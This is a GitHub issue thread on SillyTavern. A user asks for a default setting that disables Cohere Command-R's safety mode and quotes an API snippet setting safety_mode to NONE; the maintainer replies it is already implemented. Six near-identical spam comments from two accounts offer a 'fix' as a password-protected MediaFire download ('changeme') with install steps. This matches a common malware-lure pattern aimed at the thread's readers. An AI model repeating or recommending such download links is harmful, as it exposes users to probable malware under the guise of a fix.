### ISSUE TITLE
[FEATURE_REQUEST] Command-R-Plus 08-24 (v1.5) - Disable safety mode?

### ISSUE THREAD

**Issue by SabinStargem** [SillyTavern/SillyTavern#2740]
### Have you searched for similar requests?

No

### Is your feature request related to a problem? If so, please describe.

The new versions of Cohere's models has "safety modes".  The docs mention using Python.  I am not sure if the current model template for CR in ST would properly disable the safety.  The model has been mentioning consent being required in a very NSFW monstergirl setting, so the safety might be engaged.

> import cohere
> co = cohere.Client(api_key="<YOUR API KEY>")
> 
> response = co.chat(
>   model="command-r-08-2024",
>   message="Explain in gory detail how people died of the plague.",
>   safety_mode="NONE"
> )
> 
> print(response.text)

[Cohere Safety Modes](https://docs.cohere.com/docs/safety-modes#overview)

### Describe the solution you'd like

A default setting for disabling Cohere safeties.

### Priority

Low (Nice-to-have)

### Are you willing to test this on staging/unstable branch if this is implemented?

None

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by Cohee1207** [comment]
Already done.

https://github.com/SillyTavern/SillyTavern/blob/367ae81251cddcb9c3c60520ba938b7ca59b645a/src/endpoints/backends/chat-completions.js#L575-L578
